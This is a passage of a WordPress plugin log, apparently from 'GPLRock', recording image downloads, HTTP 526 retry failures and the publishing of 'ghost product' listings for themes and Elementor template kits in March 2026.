Error: . Retrying... [20-Mar-2026 06:16:52 UTC] GPLRock: Image download failed for product device-slider-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/device-slider-for-wpbakery-page-builder-25336.webp for product device-slider-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:54 UTC] GPLRock: Image download failed for product device-slider-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:56 UTC] GPLRock: Image download failed for product device-slider-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [20-Mar-2026 06:16:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/device-slider-for-wpbakery-page-builder-25336.webp for product device-slider-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [20-Mar-2026 06:16:59 UTC] GPLRock WARNING: Image download failed for product device-slider-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/device-slider-for-wpbakery-page-builder-25336.webp [20-Mar-2026 06:16:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: device-slider-for-wpbakery-page-builder [20-Mar-2026 19:00:42 UTC] GPLRock: Image downloaded successfully for product teamer-seo-marketing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3175aa6.webp [20-Mar-2026 19:00:47 UTC] GPLRock: Using pre-downloaded image for product teamer-seo-marketing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e3175aa6.webp [20-Mar-2026 19:00:47 UTC] GPLRock: Ghost product published with image - Product ID: teamer-seo-marketing-elementor-template-kit [20-Mar-2026 19:00:49 UTC] GPLRock: Image downloaded successfully for product taxpay-advisor-financial-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a16e27f7.webp [20-Mar-2026 19:00:50 UTC] GPLRock: Using pre-downloaded image for product taxpay-advisor-financial-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a16e27f7.webp [20-Mar-2026 19:00:50 UTC] GPLRock: Ghost product published with image - Product ID: taxpay-advisor-financial-consulting-elementor-template-kit [20-Mar-2026 19:00:51 UTC] GPLRock: Image downloaded successfully for product tanago-green-renewable-energy-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62b7d701.webp [20-Mar-2026 19:00:51 UTC] GPLRock: Using pre-downloaded image for product tanago-green-renewable-energy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-62b7d701.webp [20-Mar-2026 19:00:51 UTC] GPLRock: Ghost product published with image - Product ID: tanago-green-renewable-energy-elementor-template-kit [20-Mar-2026 19:00:53 UTC] GPLRock: Image downloaded successfully for product tami-landscape-gardening-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-08debaa1.webp [20-Mar-2026 19:00:54 UTC] GPLRock: Using pre-downloaded image for product tami-landscape-gardening-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-08debaa1.webp [20-Mar-2026 19:00:54 UTC] GPLRock: Ghost product published with image - Product ID: tami-landscape-gardening-elementor-template-kit [20-Mar-2026 19:00:56 UTC] GPLRock: Image downloaded successfully for product talk-action-colorful-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-309cabcf.webp [20-Mar-2026 19:00:56 UTC] GPLRock: Using pre-downloaded image for product talk-action-colorful-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-309cabcf.webp [20-Mar-2026 19:00:56 UTC] GPLRock: Ghost product published with image - Product ID: talk-action-colorful-digital-agency-elementor-template-kit [20-Mar-2026 19:00:57 UTC] GPLRock: Image downloaded successfully for product taleem-online-education-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58588d36.webp [20-Mar-2026 19:00:57 UTC] GPLRock: Using pre-downloaded image for product taleem-online-education-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58588d36.webp [20-Mar-2026 19:00:57 UTC] GPLRock: Ghost product published with image - Product ID: taleem-online-education-elementor-template-kit [20-Mar-2026 19:00:59 UTC] GPLRock: Image downloaded successfully for product takei-news-magazine-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7a30711.webp [20-Mar-2026 19:00:59 UTC] GPLRock: Using pre-downloaded image for product takei-news-magazine-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7a30711.webp [20-Mar-2026 19:00:59 UTC] GPLRock: Ghost product published with image - Product ID: takei-news-magazine-template-kit [20-Mar-2026 19:01:00 UTC] GPLRock: Image downloaded successfully for product tailoress-tailor-service-made-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bab64cd9.webp [20-Mar-2026 19:01:00 UTC] GPLRock: Using pre-downloaded image for product tailoress-tailor-service-made-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bab64cd9.webp [20-Mar-2026 19:01:00 UTC] GPLRock: Ghost product published with image - Product ID: tailoress-tailor-service-made-elementor-template-kit [20-Mar-2026 19:01:02 UTC] GPLRock: Image downloaded successfully for product tailora-clothing-alteration-tailoring-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f544534.jpg [20-Mar-2026 19:01:04 UTC] GPLRock: Using pre-downloaded image for product tailora-clothing-alteration-tailoring-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f544534.jpg [20-Mar-2026 19:01:04 UTC] GPLRock: Ghost product published with image - Product ID: tailora-clothing-alteration-tailoring-service-elementor-template-kit [20-Mar-2026 19:01:08 UTC] GPLRock: Image downloaded successfully for product synauw-online-course-education-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-375aacdc.jpg [20-Mar-2026 19:01:09 UTC] GPLRock: Using pre-downloaded image for product synauw-online-course-education-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-375aacdc.jpg [20-Mar-2026 19:01:09 UTC] GPLRock: Ghost product published with image - Product ID: synauw-online-course-education-elementor-template-kit [20-Mar-2026 19:01:45 UTC] GPLRock: Image downloaded successfully for product betterlinks-pro-shorten-track-manage-links-in-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f36559a2.jpg [20-Mar-2026 19:01:45 UTC] GPLRock: Using pre-downloaded image for product betterlinks-pro-shorten-track-manage-links-in-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f36559a2.jpg [20-Mar-2026 19:01:45 UTC] GPLRock: Ghost product published with image - Product ID: betterlinks-pro-shorten-track-manage-links-in-wordpress [20-Mar-2026 19:01:47 UTC] GPLRock: Image downloaded successfully for product optima-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-689dcc17.jpg [20-Mar-2026 19:01:47 UTC] GPLRock: Using pre-downloaded image for product optima-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-689dcc17.jpg [20-Mar-2026 19:01:47 UTC] GPLRock: Ghost product published with image - Product ID: optima-multipurpose-wordpress-theme [20-Mar-2026 19:01:48 UTC] GPLRock: Image downloaded successfully for product woocommerce-dynamic-pricing-discounts-with-ai (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3fac52a0.jpg [20-Mar-2026 19:01:50 UTC] GPLRock: Using pre-downloaded image for product woocommerce-dynamic-pricing-discounts-with-ai: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3fac52a0.jpg [20-Mar-2026 19:01:50 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-dynamic-pricing-discounts-with-ai [20-Mar-2026 19:01:53 UTC] GPLRock: Image downloaded successfully for product woocommerce-order-tracker (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-77e7568f.jpg [20-Mar-2026 19:01:53 UTC] GPLRock: Using pre-downloaded image for product woocommerce-order-tracker: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-77e7568f.jpg [20-Mar-2026 19:01:53 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-order-tracker [20-Mar-2026 19:01:54 UTC] GPLRock: Image downloaded successfully for product gpt-ai-power-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ca73552.webp [20-Mar-2026 19:01:54 UTC] GPLRock: Using pre-downloaded image for product gpt-ai-power-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ca73552.webp [20-Mar-2026 19:01:54 UTC] GPLRock: Ghost product published with image - Product ID: gpt-ai-power-pro [20-Mar-2026 19:01:56 UTC] GPLRock: Image downloaded successfully for product docly-documentation-and-knowledge-base-wordpress-theme-with-bbpress-helpdesk-forum (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4a3fe6ac.jpg [20-Mar-2026 19:01:56 UTC] GPLRock: Using pre-downloaded image for product docly-documentation-and-knowledge-base-wordpress-theme-with-bbpress-helpdesk-forum: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4a3fe6ac.jpg [20-Mar-2026 19:01:56 UTC] GPLRock: Ghost product published with image - Product ID: docly-documentation-and-knowledge-base-wordpress-theme-with-bbpress-helpdesk-forum [20-Mar-2026 19:01:57 UTC] GPLRock: Image downloaded successfully for product woocommerce-whatsapp-order-receive-orders-using-whatsapp-woocommerce-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea22a219.jpg [20-Mar-2026 19:01:58 UTC] GPLRock: Using pre-downloaded image for product woocommerce-whatsapp-order-receive-orders-using-whatsapp-woocommerce-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea22a219.jpg [20-Mar-2026 19:01:58 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-whatsapp-order-receive-orders-using-whatsapp-woocommerce-plugin [20-Mar-2026 19:01:59 UTC] GPLRock: Image downloaded successfully for product elemailer-elementor-email-template-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-950a9a6e.jpg [20-Mar-2026 19:01:59 UTC] GPLRock: Using pre-downloaded image for product elemailer-elementor-email-template-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-950a9a6e.jpg [20-Mar-2026 19:01:59 UTC] GPLRock: Ghost product published with image - Product ID: elemailer-elementor-email-template-builder [20-Mar-2026 19:02:01 UTC] GPLRock: Image downloaded successfully for product zuperla-creative-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-876a93ee.jpg [20-Mar-2026 19:02:01 UTC] GPLRock: Using pre-downloaded image for product zuperla-creative-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-876a93ee.jpg [20-Mar-2026 19:02:01 UTC] GPLRock: Ghost product published with image - Product ID: zuperla-creative-multi-purpose-wordpress-theme [20-Mar-2026 19:02:03 UTC] GPLRock: Image downloaded successfully for product wp-funnels-pro-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-44a7a824.jpg [20-Mar-2026 19:02:03 UTC] GPLRock: Using pre-downloaded image for product wp-funnels-pro-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-44a7a824.jpg [20-Mar-2026 19:02:03 UTC] GPLRock: Ghost product published with image - Product ID: wp-funnels-pro-for-wordpress [20-Mar-2026 19:16:04 UTC] GPLRock: Image downloaded successfully for product cakeryshop-bakery-business-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c35f5b87.jpg [20-Mar-2026 19:16:04 UTC] GPLRock: Using pre-downloaded image for product cakeryshop-bakery-business-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c35f5b87.jpg [20-Mar-2026 19:16:04 UTC] GPLRock: Ghost product published with image - Product ID: cakeryshop-bakery-business-template-kit [20-Mar-2026 19:16:06 UTC] GPLRock: Image downloaded successfully for product cakecrumbs-bakery-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d8aacc22.webp [20-Mar-2026 19:16:06 UTC] GPLRock: Using pre-downloaded image for product cakecrumbs-bakery-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d8aacc22.webp [20-Mar-2026 19:16:06 UTC] GPLRock: Ghost product published with image - Product ID: cakecrumbs-bakery-elementor-template-kit [20-Mar-2026 19:16:07 UTC] GPLRock: Image downloaded successfully for product cakecane-cake-pastry-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-30b4e015.jpg [20-Mar-2026 19:16:08 UTC] GPLRock: Using pre-downloaded image for product cakecane-cake-pastry-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-30b4e015.jpg [20-Mar-2026 19:16:08 UTC] GPLRock: Ghost product published with image - Product ID: cakecane-cake-pastry-elementor-template-kit [20-Mar-2026 19:16:09 UTC] GPLRock: Image downloaded successfully for product cafert-cafe-and-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9242644.jpg [20-Mar-2026 19:16:09 UTC] GPLRock: Using pre-downloaded image for product cafert-cafe-and-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9242644.jpg [20-Mar-2026 19:16:09 UTC] GPLRock: Ghost product published with image - Product ID: cafert-cafe-and-restaurant-elementor-template-kit [20-Mar-2026 19:16:11 UTC] GPLRock: Image downloaded successfully for product cabello-professional-stylist-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87769487.webp [20-Mar-2026 19:16:12 UTC] GPLRock: Using pre-downloaded image for product cabello-professional-stylist-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87769487.webp [20-Mar-2026 19:16:12 UTC] GPLRock: Ghost product published with image - Product ID: cabello-professional-stylist-elementor-template-kit [20-Mar-2026 19:16:13 UTC] GPLRock: Image downloaded successfully for product cabel-electricity-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c22454d7.webp [20-Mar-2026 19:16:14 UTC] GPLRock: Using pre-downloaded image for product cabel-electricity-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c22454d7.webp [20-Mar-2026 19:16:14 UTC] GPLRock: Ghost product published with image - Product ID: cabel-electricity-services-elementor-template-kit [20-Mar-2026 19:16:15 UTC] GPLRock: Image downloaded successfully for product c-age-creative-agency-personal-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb85504c.webp [20-Mar-2026 19:16:15 UTC] GPLRock: Using pre-downloaded image for product c-age-creative-agency-personal-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb85504c.webp [20-Mar-2026 19:16:15 UTC] GPLRock: Ghost product published with image - Product ID: c-age-creative-agency-personal-portfolio-elementor-template-kit [20-Mar-2026 19:16:16 UTC] GPLRock: Image downloaded successfully for product byte-cyber-security-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3605b46c.webp [20-Mar-2026 19:16:16 UTC] GPLRock: Using pre-downloaded image for product byte-cyber-security-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3605b46c.webp [20-Mar-2026 19:16:16 UTC] GPLRock: Ghost product published with image - Product ID: byte-cyber-security-business-elementor-template-kit [20-Mar-2026 19:16:18 UTC] GPLRock: Image downloaded successfully for product byson-fitness-gym-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c993fcbc.webp [20-Mar-2026 19:16:18 UTC] GPLRock: Using pre-downloaded image for product byson-fitness-gym-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c993fcbc.webp [20-Mar-2026 19:16:18 UTC] GPLRock: Ghost product published with image - Product ID: byson-fitness-gym-elementor-template-kit [20-Mar-2026 19:16:19 UTC] GPLRock: Image downloaded successfully for product byra-hotel-resort-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-622d7bff.webp [20-Mar-2026 19:16:19 UTC] GPLRock: Using pre-downloaded image for product byra-hotel-resort-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-622d7bff.webp [20-Mar-2026 19:16:19 UTC] GPLRock: Ghost product published with image - Product ID: byra-hotel-resort-elementor-template-kit [21-Mar-2026 01:23:53 UTC] GPLRock: Image download failed for product stamin-fitness-and-gym-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:23:55 UTC] GPLRock: Image download failed for product stamin-fitness-and-gym-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:23:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stamin---fitness-and-gym-wordpress-theme-2684.webp for product stamin-fitness-and-gym-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [21-Mar-2026 01:23:58 UTC] GPLRock: Image download failed for product stamin-fitness-and-gym-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:00 UTC] GPLRock: Image download failed for product stamin-fitness-and-gym-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stamin---fitness-and-gym-wordpress-theme-2684.webp for product stamin-fitness-and-gym-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [21-Mar-2026 01:24:02 UTC] GPLRock WARNING: Image download failed for product stamin-fitness-and-gym-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/stamin---fitness-and-gym-wordpress-theme-2684.webp [21-Mar-2026 01:24:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stamin-fitness-and-gym-wordpress-theme [21-Mar-2026 01:24:02 UTC] GPLRock: Image download failed for product couponhut-coupons-deals-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:05 UTC] GPLRock: Image download failed for product couponhut-coupons-deals-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/couponhut---coupons--deals-wordpress-theme-17438.webp for product couponhut-coupons-deals-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [21-Mar-2026 01:24:07 UTC] GPLRock: Image download failed for product couponhut-coupons-deals-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:09 UTC] GPLRock: Image download failed for product couponhut-coupons-deals-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/couponhut---coupons--deals-wordpress-theme-17438.webp for product couponhut-coupons-deals-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [21-Mar-2026 01:24:11 UTC] GPLRock WARNING: Image download failed for product couponhut-coupons-deals-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/couponhut---coupons--deals-wordpress-theme-17438.webp [21-Mar-2026 01:24:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: couponhut-coupons-deals-wordpress-theme [21-Mar-2026 01:24:13 UTC] GPLRock: Image download failed for product hadona-one-product-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:15 UTC] GPLRock: Image download failed for product hadona-one-product-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hadona---one-product-woocommerce-wordpress-theme-2214.webp for product hadona-one-product-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [21-Mar-2026 01:24:18 UTC] GPLRock: Image download failed for product hadona-one-product-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:20 UTC] GPLRock: Image download failed for product hadona-one-product-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hadona---one-product-woocommerce-wordpress-theme-2214.webp for product hadona-one-product-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [21-Mar-2026 01:24:22 UTC] GPLRock WARNING: Image download failed for product hadona-one-product-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hadona---one-product-woocommerce-wordpress-theme-2214.webp [21-Mar-2026 01:24:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hadona-one-product-woocommerce-wordpress-theme [21-Mar-2026 01:24:23 UTC] GPLRock: Image download failed for product govarnex-city-government-and-municipality-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:25 UTC] GPLRock: Image download failed for product govarnex-city-government-and-municipality-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/govarnex---city-government-and-municipality-wordpress-theme-17838.webp for product govarnex-city-government-and-municipality-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [21-Mar-2026 01:24:27 UTC] GPLRock: Image download failed for product govarnex-city-government-and-municipality-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:29 UTC] GPLRock: Image download failed for product govarnex-city-government-and-municipality-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/govarnex---city-government-and-municipality-wordpress-theme-17838.webp for product govarnex-city-government-and-municipality-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [21-Mar-2026 01:24:31 UTC] GPLRock WARNING: Image download failed for product govarnex-city-government-and-municipality-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/govarnex---city-government-and-municipality-wordpress-theme-17838.webp [21-Mar-2026 01:24:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: govarnex-city-government-and-municipality-wordpress-theme [21-Mar-2026 01:24:31 UTC] GPLRock: Image download failed for product firezy-wp-elementor-multi-purpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:33 UTC] GPLRock: Image download failed for product firezy-wp-elementor-multi-purpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/firezy-wp---elementor-multi-purpose-woocommerce-theme-30023.webp for product firezy-wp-elementor-multi-purpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [21-Mar-2026 01:24:36 UTC] GPLRock: Image download failed for product firezy-wp-elementor-multi-purpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:38 UTC] GPLRock: Image download failed for product firezy-wp-elementor-multi-purpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/firezy-wp---elementor-multi-purpose-woocommerce-theme-30023.webp for product firezy-wp-elementor-multi-purpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [21-Mar-2026 01:24:40 UTC] GPLRock WARNING: Image download failed for product firezy-wp-elementor-multi-purpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/firezy-wp---elementor-multi-purpose-woocommerce-theme-30023.webp [21-Mar-2026 01:24:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: firezy-wp-elementor-multi-purpose-woocommerce-theme [21-Mar-2026 01:24:41 UTC] GPLRock: Image download failed for product houseland-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:43 UTC] GPLRock: Image download failed for product houseland-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/houseland---real-estate-wordpress-theme-30037.webp for product houseland-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [21-Mar-2026 01:24:45 UTC] GPLRock: Image download failed for product houseland-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [21-Mar-2026 01:24:47 UTC] GPLRock: Image download failed for product houseland-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [22-Mar-2026 01:34:30 UTC] GPLRock: Image downloaded successfully for product baltoo-tattoo-studio-and-artist-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-541d5442.jpg [22-Mar-2026 01:34:30 UTC] GPLRock: Using pre-downloaded image for product baltoo-tattoo-studio-and-artist-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-541d5442.jpg [22-Mar-2026 01:34:30 UTC] GPLRock: Ghost product published with image - Product ID: baltoo-tattoo-studio-and-artist-elementor-template-kit [22-Mar-2026 01:34:32 UTC] GPLRock: Image downloaded successfully for product jupiterx-multi-purpose-responsive-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6bf0bdf9.jpg [22-Mar-2026 01:34:32 UTC] GPLRock: Image downloaded successfully for product aviacademy-aviation-flight-school-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58459d4c.jpg [22-Mar-2026 01:34:33 UTC] GPLRock: Using pre-downloaded image for product jupiterx-multi-purpose-responsive-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6bf0bdf9.jpg [22-Mar-2026 01:34:33 UTC] GPLRock: Using pre-downloaded image for product aviacademy-aviation-flight-school-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-58459d4c.jpg [22-Mar-2026 01:34:34 UTC] GPLRock: Ghost product published with image - Product ID: aviacademy-aviation-flight-school-elementor-template-kit [22-Mar-2026 01:34:34 UTC] GPLRock: Ghost product published with image - Product ID: jupiterx-multi-purpose-responsive-theme [22-Mar-2026 01:34:36 UTC] GPLRock: Image downloaded successfully for product mythemeshop-ad-sense-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-222d13a2.jpg [22-Mar-2026 01:34:36 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-ad-sense-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-222d13a2.jpg [22-Mar-2026 01:34:36 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-ad-sense-wordpress-theme [22-Mar-2026 01:34:36 UTC] GPLRock: Image downloaded successfully for product aventoura-travel-tour-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-353c8d70.webp [22-Mar-2026 01:34:36 UTC] GPLRock: Using pre-downloaded 